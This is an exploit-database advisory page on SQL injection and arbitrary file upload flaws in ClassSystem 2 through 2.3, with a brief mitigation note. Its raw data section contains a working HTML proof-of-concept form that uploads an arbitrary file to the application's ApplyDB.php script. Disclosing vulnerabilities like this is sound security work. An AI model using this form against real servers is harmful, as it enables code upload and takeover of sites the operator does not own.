header-logo
Suggest Exploit
vendor:
ClassSystem
by:
SecurityFocus
8.8
CVSS
HIGH
Multiple Input Validation Vulnerabilities
89,95
CWE
Product Name: ClassSystem
Affected Version From: ClassSystem 2
Affected Version To: ClassSystem 2.3
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

ClassSystem Multiple Input Validation Vulnerabilities

ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability. Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Input validation should be used to detect unauthorized input before it is processed by the application. Sanitize all user-supplied data to prevent SQL injection attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/29372/info
   
ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability.
   
Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
   
ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable. 

<form enctype="multipart/form-data" action="http://www.example.com/class/ApplyDB.php" method="post">
 <input type="hidden" name="teacher_account" value="blah1">
 <input type="hidden" name="teacher_password" value="blah1">
 <input type="file" name="uploadfile" size="40"><br>
 <input type="submit" value="send">
</form>